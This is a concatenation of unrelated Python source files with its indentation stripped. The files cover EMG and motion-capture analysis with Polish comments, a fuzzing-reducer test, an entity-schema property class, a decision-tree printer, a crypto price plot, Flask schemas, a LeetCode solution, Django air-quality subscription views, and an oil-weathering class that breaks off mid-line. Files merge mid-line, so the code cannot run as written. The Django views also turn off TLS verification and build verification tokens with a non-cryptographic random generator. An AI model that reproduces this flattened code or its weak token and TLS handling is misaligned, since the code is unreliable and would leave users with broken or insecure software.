(filename.split('\\')[-1]).split('.')[0]+ '-K' + str(i+1) + '.c3d') writer.Update() def read_labels(data_path,frame_rate): """ Funkcja zwraca tablice [p, k], w której są zapisane czasy eventow oznaczających przyjecie postawy poczatkowej. Input: - data_path - sciezka do pliku c3d - frame_rate - częstotliwośc próbkowania danych w pliku Output: - [p,k] - tablice punktów startowych (s) i końcowych(k) """ c3d_to_compare= c3d(data_path) event = c3d_to_compare['parameters']['EVENT']['LABELS']['value'] czas = np.around(c3d_to_compare['parameters']['EVENT']['TIMES']['value'][1]*frame_rate) eventy = [event, czas] eventy[0].index('Foot Strike') indxE = [i for i, x in enumerate(eventy[0]) if x == "Event"] indxFS = [i for i, x in enumerate(eventy[0]) if x == "Foot Strike"] CzasFS = np.zeros(len(indxFS)) for i in range(len(indxFS)): CzasFS[i] = eventy[1][indxFS[i]] CzasE = np.zeros(len(indxE)) for i in range(len(indxE)): CzasE[i] = eventy[1][indxE[i]] eventy[1].sort() p = [] k = [] for i in range(len(eventy[1])): if not i >= len(eventy[1])-2: pierwszy = eventy[1][i] drugi = eventy[1][i+1] trzeci = eventy[1][i+2] if pierwszy in CzasE: if drugi in CzasFS: if trzeci in CzasE: p.append(int(pierwszy)) k.append(int(trzeci)) return [p,k] def nowy_czas_marker(numer_markera,ev,markers): """ Funkcja do obliczania nowego punktu startowego (s) i końcowego (k). Input: - numer_markera - numer markera według któreg liczymy nowe punkty (sugerowana prawa dłoń lub prawa stopa) - ev - początek i koniec ruchu na podstawie eventów (to co zwraca funkcja read_labels) - markers - współrzędne markerów (Markers.from_c3d(data_path, prefix_delimiter=":")) Output: - [s,k] - nowe punkty startowe (s) i końcowe(k) """ s=np.zeros(len(ev[0])) k=np.zeros(len(ev[0])) #liczymy rozniczkę dla każdego uderzenia (od eventu postawy początkowej do eventu postawy początkowej for i in range(len(ev[0])): output_difference=np.diff(markers[1][numer_markera][ev[0][i]:ev[1][i]]) #ustalenie nowego startu i końca ruchu dz=max(output_difference)*0.2 dx=min(output_difference)*0.9 s[i]=np.argmax(output_difference>dz)-40 k[i]=len(output_difference) - np.argmax(output_difference[::-1]>dx)+40 #warunki, które mają zabezpieczać przed wyjściem za zakres pociętego nagrania if s[i]<0: s[i]=0 if k[i]>ev[1][i]: k[i]=ev[1][i] return [s,k] def nowy_czas_analog(p,d,analogs): """ Funkcja do obliczania nowego punktu startowego (s) i końcowego (k). Input: - p,d - początek i koniec ruchu na podstawie eventów (p,d - to co zwraca funkcja read_labels) - analogs - przegieg sygnału EMG dla wybranego mięśnia ((Analogs.from_c3d(datapath, usecols=muscles))[numer_mięśnia]) Output: - [s,k] - nowe punkty startowe (s) i końcowe(k) """ ev=[p,d] s=np.zeros(len(ev[0])) k=np.zeros(len(ev[0])) #liczymy rozniczkę dla każdego uderzenia (od eventu postawy początkowej do eventu postawy początkowej for i in range(len(ev[0])): output_difference=np.diff(analogs[ev[0][i]:ev[1][i]]) #ustalenie nowego startu i końca ruchu dz=max(output_difference)*0.2 dx=min(output_difference)*0.9 s[i]=np.argmax(output_difference>dz) k[i]=len(output_difference) - np.argmax(output_difference>dx) #warunki, które mają zabezpieczać przed wyjściem za zakres pociętego nagrania if s[i]<0: s[i]=0 if k[i]>ev[1][i]: k[i]=ev[1][i] return [s,k] def przesuwanie_wykresow(ev,numer_markera,s,k,markers): """ Funkcja do wyświetlania wykresów markerów przesuniętych w fazie. Input: - ev - początek i koniec ruchu na podstawie eventów (to co zwraca funkcja read_labels) - s,k - nowege punkty startowe i końcowe (zwraca je funkcja nowy_czas_marker) - numer_markera - określa dla którego markera chcemy wyświetlić wykres - markers - współrzędne markerów (Markers.from_c3d(data_path, prefix_delimiter=":")) Output: - Wykresy położenia zadanego markera """ #robimy z k i s inty, bo były z tym problemy #tworzymy nową tablicę zawierającą czasy startu i końca ruchu evi=np.zeros((len(ev),len(ev[0]))) for i in range(len(ev[0])): k.astype(int) s.astype(int) evi[1][i]=ev[0][i]+k[i] evi[0][i]=ev[0][i]+s[i] #dla 3 osi robimy pętlę z robieniem wykresu for j in range(3): #dla ilości powtórzeń (zwykle 10) robimy pętlę żeby wyrzucało je na tym samym wykresie for i in range(len(evi[0])): #normalizacja markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]=(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]-min(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]))/(max(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])])-min(markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])])) #operacja żeby rozciągnąć wykresy na tym samym okresie czasu (0-100) t_konc=100 dl_ciagu=int(evi[1][i])-int(evi[0][i]) x=np.linspace(0,t_konc, dl_ciagu) #plotowanie wykresu, w danej osi (ponieważ jest w pętli to zrobi się dla 3), dla danego numeru markera, od klatki startowej do końcowej plt.plot(x, markers[j][numer_markera][int(evi[0][i]):int(evi[1][i])]) plt.show() def wykresy_markerow(path,markers): """ Funkcja do wyświetlania wykresów markerów. Input: - path - ściezka do pliku c3d - markers - współrzędne markerów (Markers.from_c3d(path, prefix_delimiter=":")) Output: - Wykresy położenia markerów """ c = c3d(path) n_markers = ["LSHO","LELB","LWRA","RSHO","RELB","RWRA","RASI","RKNE","RANK"] # lista waznych markerow axes = ["x","y","z"] body = path.split('-')[3]+":" p,k = read_labels(path,200) for mark in markers: n = c['parameters']['POINT']['LABELS']['value'][0:44].index(body+mark) for i in range(3): for j in range(len(p)): plt.plot(c['data']['points'][i][n][p[j]:k[j]]) plt.title(axes[i]) plt.show() def read_analog_allmuscles(datapath): """ Funkcja do wczytywania danych EMG dla wszystkich mięśni z pliku c3d. Input: - datapath - ścieżka do pliku c3d z danymi Output: - emg - dane EMG z wczytanego pliku dla wszystkich mięśni """ muscles = ["Voltage.1","Voltage.2","Voltage.3","Voltage.4","Voltage.5","Voltage.6","Voltage.7","Voltage.8","Voltage.9","Voltage.10","Voltage.11","Voltage.12","Voltage.13","Voltage.14","Voltage.15","Voltage.16"] emg = Analogs.from_c3d(datapath, usecols=muscles) return emg def rename_emg(emg): """ Funkcja do zmiany nazw kanałów EMG na nazwy odpowiadających im mięśni. Input: - emg - dane EMG z wczytanego pliku dla wszystkich mięśni z oryginalnymi nagłówkami (Analogs.from_c3d(datapath, usecols=muscles)) Output: - emg - dane EMG z wczytanego pliku dla wszystkich mięśni ze zmienionymi nagłówkami """ muscles_names = ["Czworoboczny grzbietu L","Trójgłowy ramienia L", "Dwugłowy ramienia L", "Prostownik nadgarstka L","Skośny brzucha L", "Pośladkowy średni L","Czworogłowy uda L", "Brzuchaty łydki L","Czworoboczny grzbietu P","Trójgłowy ramienia P", "Dwugłowy ramienia P", "Prostownik nadgarstka P","Skośny brzucha P", "Pośladkowy średni P","Czworogłowy uda P", "Brzuchaty łydki P"] emg['channel'] = muscles_names return emg def show_emg_data(emg): """ Funkcja do wyświetlania danych EMG. Input: - emg - dane EMG z pliku c3d (Analogs.from_c3d(datapath, usecols=muscles)) Output: - Wyswietlenie wykresów emg """ emg.plot(x="time", col="channel", col_wrap=3) def normalize_emg(emg): """ Funkcja wykonująca normalizację danych EMG. Input: - emg - przegiegi sygnałów EMG (Analogs.from_c3d(datapath, usecols=muscles)) Output: - Znormalizowane oraz przefiltrowane dane EMG """ emg_p = ( emg.meca.band_pass(order=2, cutoff=[10, 425]) .meca.center() .meca.abs() .meca.low_pass(order=4, cutoff=5, freq=emg.rate) .meca.normalize(ref=None, scale=1) ) return emg_p def emg_full_preproces(datapath): """ Funkcja wczytująca dane EMG z pliku c3d oraz wstępnie je przetwarzająca. Input: - datapath - ścieżka dostępu do fpliku c3d Output: - normalised_emg - znormalizowane dane EMG """ emg_data = read_analog_allmuscles(datapath) normalised_emg=normalize_emg(emg_data) return normalised_emg def show_events(data_path): """ Funkcja wyświetla wykresy: po lewej ruchy nałozone na siebie w czasie, po prawej odczyt pełnej scieżki napieć mięsni w czasie. Input: - data_path - ścieżka do pliku c3d z danymi EMG Output: - Wykresy nałożonych na siebie ruchów oraz pełnego przegiegu pracy mięsnia dla całego nagrania """ emg_processed = emg_full_preproces(data_path) p,d=read_labels(data_path, 1000) # p - moment rozpoczecia eventu, d - momen zakończenia eventu print(p,d) for num in range(16): subplot(1, 2, 1) plt.subplots_adjust(left=0.125, bottom=0.1, right=2.8, top=0.9, wspace=0.25, hspace=0.35) for i in range(len(p)): emg_processed_event=emg_processed[num][p[i]:d[i]] plt.plot(emg_processed_event) subplot(1, 2, 2) plt.plot(emg_processed[num]) plt.show() def compare_events_average(folder_path, person, exer_num): """ Funkcja wyświetlająca uśrednioną prace mięsni dla danego ćwiczenia i aktora. Input: - folder_path - ścieżka dostępu do folderu z wszystkimi nagraniami - person - nazwa aktora do wczytania - exer_num - numer ćwiczenia do wczytania Output: - Wykresy średnich przebiegów dla danego ćwiczenia """ muscles_names2 = ["Czworoboczny grzbietu L","Trójgłowy ramienia L", "Dwugłowy ramienia L", "Prostownik nadgarstka L","Skośny brzucha L", "Pośladkowy średni L","Czworogłowy uda L", "Brzuchaty łydki L","Czworoboczny grzbietu P","Trójgłowy ramienia P", "Dwugłowy ramienia P", "Prostownik nadgarstka P","Skośny brzucha P", "Pośladkowy średni P","Czworogłowy uda P", "Brzuchaty łydki P"] cons1="\*\*-E0" cons2="-*.c3d" path=folder_path+person+cons1+exer_num+cons2 aver_arr_all=np.zeros((16,1000)) for file in glob.glob(path,recursive = True): print(file) emg_processed=emg_full_preproces(file) aver_arr=np.zeros((16,1000)) file_num=0 p,d=read_labels(file, 1000) for num in range(16): for i in range(len(p)): emg_processed_event=emg_processed[num][p[i]:d[i]] emg_processed_event2 = ( emg_processed_event.meca.normalize(scale=1) ) time_normalized=emg_processed_event2.meca.time_normalize(n_frames=1000) for t in range(1000): aver_arr[num][t]=aver_arr[num][t]+time_normalized.values[t] aver_arr[num]=aver_arr[num]/10 time=np.linspace(1,1000,1000) for t2 in range(1000): aver_arr_all[file_num][t2]=aver_arr_all[file_num][t2]+time_normalized.values[t2] file_num=file_num+1; for num in range(16): subplot(1, 1, 1) plt.subplots_adjust(left=0.125, bottom=0.1, right=2, top=0.7, wspace=0.25, hspace=0.35) aver_arr_all[num]=aver_arr_all[num]/5 plt.plot(time,aver_arr_all[num]) plt.title(muscles_names2[num]) plt.show() print(aver_arr_all) def compare_events_average_shifted(folder_path, person, exer_num): """ Funkcja wyświetlająca uśrednioną prace mięsni dla danego świczenia i aktora z przesunięciem ruchów w fazie. Input: - folder_path - ścieżka dostępu do folderu z wszystkimi nagraniami - person - Nazwa aktora do wczytania - exer_num - Nazwa ćwiczenia do wczytania Output: - Wykresy średnich przebiegów dla danego ćwiczenia z przesunięciem ruchów w fazie """ muscles_names2 = ["Czworoboczny grzbietu L","Trójgłowy ramienia L", "Dwugłowy ramienia L", "Prostownik nadgarstka L","Skośny brzucha L", "Pośladkowy średni L","Czworogłowy uda L", "Brzuchaty łydki L","Czworoboczny grzbietu P","Trójgłowy ramienia P", "Dwugłowy ramienia P", "Prostownik nadgarstka P","Skośny brzucha P", "Pośladkowy średni P","Czworogłowy uda P", "Brzuchaty łydki P"] cons1="\*\*-E0" cons2="-*.c3d" path=folder_path+person+cons1+exer_num+cons2 aver_arr_all=np.zeros((16,1000)) for file in glob.glob(path,recursive = True): print(file) emg_processed=emg_full_preproces(file) aver_arr=np.zeros((16,1000)) file_num=0 p,d=read_labels(file, 1000) ev=[p,d] for num in range(16): s,k=nowy_czas_analog(p,d,emg_processed[num]) for i in range(len(p)): emg_processed_event=emg_processed[num][(p[i]+s[i].astype(int)):(d[i]+k[i].astype(int))] emg_processed_event2 = ( emg_processed_event.meca.normalize(scale=1) ) time_normalized=emg_processed_event2.meca.time_normalize(n_frames=1000) for t in range(1000): aver_arr[num][t]=aver_arr[num][t]+time_normalized.values[t] aver_arr[num]=aver_arr[num]/10 time=np.linspace(1,1000,1000) for t2 in range(1000): aver_arr_all[file_num][t2]=aver_arr_all[file_num][t2]+time_normalized.values[t2] file_num=file_num+1; for num in range(16): subplot(1, 1, 1) plt.subplots_adjust(left=0.125, bottom=0.1, right=2, top=0.7, wspace=0.25, hspace=0.35) aver_arr_all[num]=aver_arr_all[num]/5 plt.plot(time,aver_arr_all[num]) plt.title(muscles_names2[num]) plt.show() # Copyright (c) 2018-2021 , . # # Licensed under the BSD 3-Clause License # . # This file may not be copied, modified, or distributed except # according to those terms. import json import os import pytest from functools import partial import fuzzinator from common_reduce import MockFailIfContainsCall, mock_grammars_dir @pytest.mark.parametrize('format, grammar, start, replacements', [ (None, json.dumps([os.path.join(mock_grammars_dir, 'MockGrammar.g4')]), 'text', os.path.join(mock_grammars_dir, 'mock_replacements.json')), (os.path.join(mock_grammars_dir, 'mock_format.json'), None, None, None), ]) @pytest.mark.parametrize('call, call_init_kwargs, issue, exp_test, exp_issues', [ (MockFailIfContainsCall, {'strings': [b'bar\n']}, {'id': b'bar\n', 'test': b'foo\nbar\nbaz\n'}, b'bar\n', []), (MockFailIfContainsCall, {'strings': [b'bar\n', b'ar\n']}, {'id': b'bar\n', 'test': b'foo\nbar\nbaz\n'}, b'bar\n', [{'id': b'ar\n', 'test': b'ar\n'}]), ]) def test_picireny(call, call_init_kwargs, issue, format, grammar, start, replacements, exp_test, exp_issues, tmpdir): reducer = fuzzinator.reduce.Picireny(format=format, grammar=grammar, start=start, replacements=replacements, work_dir=str(tmpdir)) reduced_test, new_issues = reducer(sut_call=call(**call_init_kwargs), issue=issue, on_job_progressed=partial(fuzzinator.listener.EventListener(None).on_job_progressed, job_id=None)) assert reduced_test == exp_test assert new_issues == exp_issues from banal import is_mapping, as_bool from typing import TYPE_CHECKING, Any, List, Optional, TypedDict from followthemoney.exc import InvalidModel from followthemoney.types import registry from followthemoney.rdf import NS, URIRef from followthemoney.util import gettext, get_entity_id if TYPE_CHECKING: from followthemoney.schema import Schema class ReverseSpec(TypedDict, total=False): name: str label: Optional[str] hidden: Optional[bool] class PropertyDict(TypedDict, total=False): label: Optional[str] description: Optional[str] type: Optional[str] hidden: Optional[bool] matchable: Optional[bool] # stub: Optional[bool] rdf: Optional[str] range: Optional[str] class PropertySpec(PropertyDict): reverse: ReverseSpec class PropertyToDict(PropertyDict, total=False): name: str qname: str reverse: Optional[str] stub: Optional[bool] class Property: """A definition of a value-holding field on a schema. Properties define the field type and other possible constraints. They also serve as entity to entity references.""" __slots__ = ( "model", "schema", "name", "qname", "_label", "_hash", "_description", "hidden", "type", "matchable", "_range", "range", "stub", "_reverse", "reverse", "uri", ) #: Invalid property names. RESERVED = ["id", "caption", "schema", "schemata"] def __init__(self, schema: "Schema", name: str, data: PropertySpec) -> None: self.model = schema.model #: The schema which the property is defined for. This is always the #: most abstract schema that has this property, not the possible #: child schemata that inherit it. self.schema = schema #: Machine-readable name for this property. self.name = name #: Qualified property name, which also includes the schema name. self.qname = "%s:%s" % (schema.name, self.name) if self.name in self.RESERVED: raise InvalidModel("Reserved name: %s" % self.name) self._hash = hash("" % self.qname) self._label = data.get("label", name) self._description = data.get("description") #: This property should not be shown or mentioned in the user interface. self.hidden = as_bool(data.get("hidden", False)) type_ = data.get("type", "string") if type_ is None or type_ not in registry.named: raise InvalidModel("Invalid type: %s" % type_) #: The data type for this property. self.type = registry[type_] #: Whether this property should be used for matching and cross-referencing. self.matchable = as_bool(data.get("matchable", self.type.matchable)) #: If the property is of type ``entity``, the set of valid schema to be added #: in this property can be constrained. For example, an asset can be owned, #: but a person cannot be owned. self._range = data.get("range") self.range: Optional["Schema"] = None #: When a property points to another schema, a reverse property is added for #: various administrative reasons. These properties are, however, not real #: and cannot be written to. That's why they are marked as stubs and adding #: values to them will raise an exception. self.stub: Optional[bool] = False #: When a property points to another schema, a stub reverse property is #: added as a place to store metadata to help display the link in inverted #: views. self._reverse = data.get("reverse") self.reverse: Optional["Property"] = None #: RDF term for this property (i.e. the predicate URI). self.uri = URIRef(data.get("rdf", NS[self.qname])) def generate(self) -> None: """Setup method used when loading the model in order to build out the reverse links of the property.""" self.model.properties.add(self) if self.type == registry.entity: if self.range is None and self._range is not None: self.range = self.model.get(self._range) if self.reverse is None and self.range and self._reverse: if not is_mapping(self._reverse): raise InvalidModel("Invalid reverse: %s" % self) self.reverse = self.range._add_reverse(self._reverse, self) @property def label(self) -> str: """User-facing title for this property.""" return gettext(self._label) @property def description(self) -> str: """A longer description of the semantics of this property.""" return gettext(self._description) def specificity(self, value: str) -> float: """Return a measure of how precise the given value is.""" if not self.matchable: return 0.0 return self.type.specificity(value) def validate(self, data: List[Any]) -> Optional[str]: """Validate that the data should be stored. Since the types system doesn't really have validation, this currently tries to normalize the value to see if it passes strict parsing. """ values = [] for val in data: if self.stub: return gettext("Property cannot be written") val = get_entity_id(val) if not self.type.validate(val): return gettext("Invalid value") if val is not None: values.append(val) return None def __eq__(self, other: Any) -> bool: return self._hash == hash(other) def __hash__(self) -> int: return self._hash def to_dict(self) -> PropertyToDict: """Return property metadata in a serializable form.""" data: PropertyToDict = { "name": self.name, "qname": self.qname, "label": self.label, "type": self.type.name, } if self.description: data["description"] = self.description if self.stub: data["stub"] = True if self.matchable: data["matchable"] = True if self.hidden: data["hidden"] = True if self.range is not None: data["range"] = self.range.name if self.reverse is not None: data["reverse"] = self.reverse.name return data def __repr__(self) -> str: return "" % self.qname def __str__(self) -> str: return self.qname lutzhamel/ds-assets0 """ treeviz.py A simple tree visualizer for sklearn DecisionTreeClassifiers. Written by , (c) 2017 - Univeristy of Rhode Island """ import operator def tree_print(clf, X): """ Print the tree of a sklearn DecisionTreeClassifier Parameters ---------- clf : DecisionTreeClassifier - A tree that has already been fit. X : The original training set """ tlevel = _tree_rprint('', clf, X.columns, clf.classes_) print('<',end='') for i in range(3*tlevel - 2): print('-',end='') print('>') print('Tree Depth: ',tlevel) def _tree_rprint(kword, clf, features, labels, node_index=0, tlevel_index=0): # Note: The DecisionTreeClassifier uses the Tree structure defined in: # github.com/scikit-learn/scikit-learn/blob/master/sklearn/tree/_tree.pyx # it is an array based tree implementation: # indent the nodes according to their tree level for i in range(tlevel_index): print(' |',end='') # TODO: the following should use the TREE_LEAF constant defined in _tree.pyx # instead of -1, not quite sure how to get at it from the tree user level if clf.tree_.children_left[node_index] == -1: # indicates leaf print(kword, end=' ' if kword else '') # get the majority label count_list = clf.tree_.value[node_index, 0] #lhh #print("count list: {}".format(count_list)) if len(count_list) == 1: # regression problem print(count_list[0]) else: # get the majority label max_index, max_value = max(enumerate(count_list), key=operator.itemgetter(1)) max_label = labels[max_index] print(max_label) return tlevel_index else: # compute and print node label feature = features[clf.tree_.feature[node_index]] threshold = clf.tree_.threshold[node_index] print(kword, end=' ' if kword else '') print('if {} =< {}: '.format(feature, threshold)) # recurse down the children left_index = clf.tree_.children_left[node_index] right_index = clf.tree_.children_right[node_index] ltlevel_index = _tree_rprint('then', clf, features, labels, left_index, tlevel_index+1) rtlevel_index = _tree_rprint('else', clf, features, labels, right_index, tlevel_index+1) # return the maximum depth of either one of the children return max(ltlevel_index,rtlevel_index) import os import sys curr_path = os.path.abspath(__file__) root_path = os.path.abspath( os.path.join(curr_path, os.path.pardir, os.path.pardir)) sys.path.append(root_path) from pyjuque.Exchanges.Binance import Binance from pyjuque.Plotting.Plotter import PlotData from pyjuque.Indicators import AddIndicator, HA import pandas as pd import plotly.graph_objs as go def Maine(): exchange = Binance() symbol = 'BTCUSDT' df = exchange.getSymbolKlines(symbol, '1d') AddIndicator(df, 'sma', 'volma', 'volume', 10) signal = df.loc[df['volume'] > 2.4 * df['volma']] s_list = [dict(name='S/R', points=[(row['time'], row['high']) if row['close'] > row['open'] else (row['time'], row['low']) for i, row in signal.iterrows()])] HA(df, ['open', 'high', 'low', 'close']) ha_df = df ha_df['open'] = df['HA_open'] ha_df['high'] = df['HA_high'] ha_df['low'] = df['HA_low'] ha_df['close'] = df['HA_close'] lines = [] last_time = df['time'][len(df)-1] for s in s_list[0]['points']: line = go.layout.Shape( type="line", x0=s[0], y0=s[1], x1=last_time, y1=s[1], ) lines.append(line) PlotData(ha_df, show_plot=True, signals=s_list, plot_shapes=lines, plot_indicators=[dict(name='volma', title="Volume MA", yaxis='y2')]) if __name__ == '__main__': Maine()flask_ecom_api/api/v1/products/schemas.py1-10 from flask_ecom_api import ( # type: ignore Category, Ingredient, Product, ProductImage, ) from flask_ecom_api.app import marshmallow class IngredientSchema(marshmallow.SQLAlchemySchema): """Product ingredient schema.""" class Meta: model = Ingredient ordered = True id = marshmallow.auto_field() name = marshmallow.auto_field() image_src = marshmallow.auto_field() weight = marshmallow.auto_field() price = marshmallow.auto_field() class ProductImageSchema(marshmallow.SQLAlchemySchema): """Product image marshmallow schema.""" class Meta: model = ProductImage ordered = True id = marshmallow.auto_field() src = marshmallow.auto_field() product_id = marshmallow.auto_field() is_main = marshmallow.auto_field() class CategorySchema(marshmallow.SQLAlchemySchema): """Product category marshmallow schema.""" class Meta: model = Category ordered = True id = marshmallow.auto_field() name = marshmallow.auto_field() description = marshmallow.auto_field() parent_id = marshmallow.auto_field() class ProductSchema(marshmallow.SQLAlchemySchema): """Product marshmallow schema.""" class Meta: model = Product ordered = True id = marshmallow.auto_field() name = marshmallow.auto_field() description = marshmallow.auto_field() price = marshmallow.auto_field() published = marshmallow.auto_field() ingredients = marshmallow.Nested(IngredientSchema, many=True) images = marshmallow.Nested(ProductImageSchema, many=True) categories = marshmallow.Nested(CategorySchema, many=True) product_schema = ProductSchema() products_schema = ProductSchema(many=True) product_image_schema = ProductImageSchema() # Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def removeLeafNodes(self, root: Optional[TreeNode], target: int) -> Optional[TreeNode]: if root: root.left = self.removeLeafNodes(root.left, target) root.right = self.removeLeafNodes(root.right, target) if root.val != target or root.left or root.right: return rootimport json import random import string from datetime import date, datetime, timedelta from functools import reduce from pathlib import Path import environ import pandas as pd import plotly.express as px import pytz import requests # from django.http import HttpResponse from django.shortcuts import Http404, get_object_or_404, render from django.template.loader import render_to_string from plotly.offline import plot from sendgrid import SendGridAPIClient from sendgrid.helpers.mail import Mail from .models import Subscription # Create your views here. ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent.parent # warmmail/ APPS_DIR = ROOT_DIR / "warmmail" env = environ.Env() env.read_env(str(ROOT_DIR / ".env")) def index(request): """ Base view - the entry page for the website. Renders a page with a search box allowing the user to search for a city or location :param request: The HTTP request :return: Renders the page """ return render(request, "subscribe/index.html") # return HttpResponse("Hello, world. You're at the polls index.") def findplace(request): """ Renders the page showing a list of all the locations. The user is allowed to submit a text name for the location including any significant address details (like city, country, etc.). Using the API exposed from geonames.org => the system renders a list of all the possible locations from which the user may select a location. Selecting a location means selecting a lat/long which is used for the subsequent steps in the journey. The function calls the Geonames.org API and requires an environment variable as follows: GEONAMES_API_USERNAME="" :param request: HTTP request, expects a POST request with param: search_term :return: Renders the page """ srch = request.POST["search_term"] response = requests.get( f"http://api.geonames.org/searchJSON?formatted=true&q={srch}&maxRows=10&lang=es&" f"username={env.str('GEONAMES_API_USERNAME')}&style=full" ) if response: items = response.json() places = [] for item in items["geonames"]: city = { "name": item["asciiName"], "country": item["countryCode"], "lat": item["lat"], "long": item["lng"], } places.append(city) return render(request, "subscribe/list_places.html", {"places": places}) else: # redirect to index with error return render(request, "subscribe/list_places.html") aqi_desc = { 50: { "level": "Good", "text": "Air quality is considered satisfactory, and air pollution poses little or no risk.", "class": "text-success", }, 100: { "level": "Moderate", "text": "Air quality is acceptable; however, for some pollutants there may be a moderate health concern " "for a very small number of people who are unusually sensitive to air pollution.", "class": "text-warning", }, 150: { "level": "Unhealthy for Sensitive Groups", "text": "Members of sensitive groups may experience health effects. " "The general public is not likely to be affected.", "class": "text-warning", }, 200: { "level": "Unhealthy", "text": "Everyone may begin to experience health effects; " "members of sensitive groups may experience more serious health effects.", "class": "text-danger", }, 250: { "level": "Very Unhealthy", "text": "Health warnings of emergency conditions. The entire population is more likely to be affected.", "class": "text-danger", }, 300: { "level": "Hazardous", "text": "Health alert: everyone may experience more serious health effects.", "class": "text-danger", }, } def selectplace(request, lat, long): """ Renders the page showing the current AQI stats and historic graphs for the selected location. The page also gives a button to the user to "subscribe" to this report. The function calls the AQICN API and requires an environment variable as follows: AQICN_TOKEN="" :param request: HTTP GET Request :param lat: The selected latitute (passed automatically from findplace) :param long: The selected longiture (passed automatically from findplace) :return: Renders page with the report for the location with a button for user to subscribe. """ # get the real time aqi data for this lat long aqi = f"https://api.waqi.info/feed/geo:{lat};{long}/?token={env.str('AQICN_TOKEN')}" response = requests.get(aqi, verify=False, timeout=2) if response: response = response.json() data = { "aqi": response["data"]["aqi"], "station": response["data"]["city"]["name"], } data["dominentpol"] = ( response["data"]["dominentpol"] if response["data"]["dominentpol"] else "pm25" ) # get aqi description for k, v in aqi_desc.items(): if k > int(data["aqi"]): data["aqi_desc"] = v break # find the name of the city from the station name with open("data/airquality-covid19-cities.json", "r") as f: cities = json.loads(f.read()) # readjust cities to make stations the keys cities = reduce( lambda x, y: {**x, **y}, list( map( lambda x: { k["Name"]: { "city": x["Place"]["name"], "country": x["Place"]["country"], } for k in x["Stations"] }, cities["data"], ) ), ) # our city of focus... city = cities[data["station"]] data["city"] = city["city"] # get parquet file df = pd.read_parquet(f"data/AQI_Data-{date.today()}.parquet") df = df[df["City"] == city["city"]].sort_index(ascending=False) df = df[df["Specie"].isin(["pm10", "pm25"])] df = df.pivot(index=None, columns="Specie", values="median") df.fillna(0, inplace=True) df.sort_index(inplace=True, ascending=False) last_7_days = df.iloc[:6] df["month"] = df.index.strftime("%Y-%m") df_month = df.groupby("month").agg("mean") last_7_days_bar = px.bar(last_7_days, title="Last 7 Days", barmode="group") month_bar = px.bar(df_month, title="Monthly", barmode="group") data["last_7_days_bar"] = plot(last_7_days_bar, output_type="div") data["month_bar"] = plot(month_bar, output_type="div") # check that the response return render(request, "subscribe/select_place.html", {"data": data}) def subscribeplace(request, city, dominentpol): """ The last step for the subsription - this view renders a page that allows the user to subscribe to the chosen report. It shows a form to the user which has the following options: * email address - with generic verification * city - auto-populated basis report selected - non editable * time of day - gives option to user to receive report in Morning / Afternoon / Evening * timezone :param request: HTTP GET Request :param city: The name of the city selected for the report - auto-populated by the previous page :param dominentpol: The name of the dominent pollutant in that city - this is a hidden field in the form which is used by the backend report generation :return: Renders the HTML page """ data = { "city": city, "dominentpol": dominentpol, } data["tz"] = pytz.all_timezones return render(request, "subscribe/subscribe_place.html", {"data": data}) time_of_day = { "M": 8, "A": 12, "E": 16, } def confirmsubscription(request): """ A simple page which saves the subscription request and sends out an email verification link The email is sent via Sendgrid and requires an environment variable with the SendGrid API token: SENDGRID_API_KEY="" :param request: HTTP Post request with fields from subscribeplace view :return: Sends out an email using SendGrid """ subscription = Subscription() subscription.email = request.POST["email"] temp_token = "".join(random.choices(string.ascii_letters + string.digits, k=24)) subscription.temp_token = temp_token subscription.city = request.POST["city"] subscription.dominentpol = request.POST["dominentpol"] today = datetime.now(tz=pytz.utc) tz = pytz.timezone(request.POST["timezone"]) loc_time = datetime( today.year, today.month, today.day, time_of_day[request.POST["timeofday"]], 0, 0 ) loc_time = tz.localize(loc_time) utc_time = loc_time.astimezone(pytz.utc) if utc_time <= today: utc_time = utc_time + timedelta(days=1) subscription.next_email_date = utc_time try: subscription.save() except: # noqa: E722 raise Http404("Sorry! This request is invalid!") data = {"subscription_id": subscription.pk, "token": temp_token} data["host"] = request.META["HTTP_ORIGIN"] # send an email to verify this html = render_to_string("subscribe/confirm_email_template.html", {"data": data}) message = Mail( from_email="", to_emails=request.POST["email"], subject="Confirm your subscription from WarmMail", html_content=html, ) try: sg = SendGridAPIClient(env.str("SENDGRID_API_KEY")) sg.send(message) except Exception as e: print(e.message) return render(request, "subscribe/confirm_subscription.html", {"data": data}) def verifyemail(request, subscription_id, token): """ The view that users come to after clicking on the email verification link. It verifies the subscription to allow processing from next day. :param request: HTTP Get Request :param subscription_id: Available from the URL :param token: Available from the URL :return: Renders the HTML page """ subscription = get_object_or_404(Subscription, pk=subscription_id) if subscription.temp_token == token: # alles gut! subscription.verified = True subscription.update_date = date.today() subscription.save() data = { "message": f"Great! Your email address has been verified. " f"You will start receiving AQI updates for {subscription.city} in 24 hours!", } return render(request, "subscribe/email_confirmed.html", {"data": data}) elif subscription.verified: data = { "message": "This subscription is already verified!", } return render(request, "subscribe/email_confirmed.html", {"data": data}) else: raise Http404("Sorry! This request is invalid!") # -*- coding: utf-8 -*- """ Created on Thu Mar 18 13:20:25 2021 @author: """ import math import numpy as np import evaporation as ev import weathering_utils as wu def interp(val, array_value, array_ref): """ Interpolate the array_value from the array_ref with val. The array_ref must be in an increasing order! """ if val <= array_ref[0]: return array_value[0] elif val > array_ref[len(array_ref)-1]: return array_value[len(array_ref)-1] else: i = 1 while val > array_ref[i]: i += 1 delta = array_ref[i] - array_ref[i-1] return ((array_ref[i]-val)*array_value[i-1]+array_value[i]*(val-array_ref[i-1]))/delta class mix: def __init__(self, name): self.name = name self.list_component = [] self.density = [] #density values depending on the temperature self.density_T = [] #temperature of the density values given above self.viscosity = [] #density values depending on the temperature self.viscosity_T = [] #temperature of the density values given above self.K_em = None self.max_water = 0.8 # max amount of water in the emulsion def generate_component_cut(self, temp, fraction, tot_amount): """ Generate the components for oils, two vectors (one with temperatures and one with cumulative amount evaporated). The total amount (m³) must be given and the temperature at which the fraction does not evaporated anymore too (in °C). It compute some basic properties for the components Parameters ---------- temp : Temperature vector fraction : Fraction vector tot_amount : Amount of the mix [m³] Raises ------ Exception Raise an exception if the two vectors does not have the same size """ if len(temp) != len(fraction): raise Exception("The two vectors 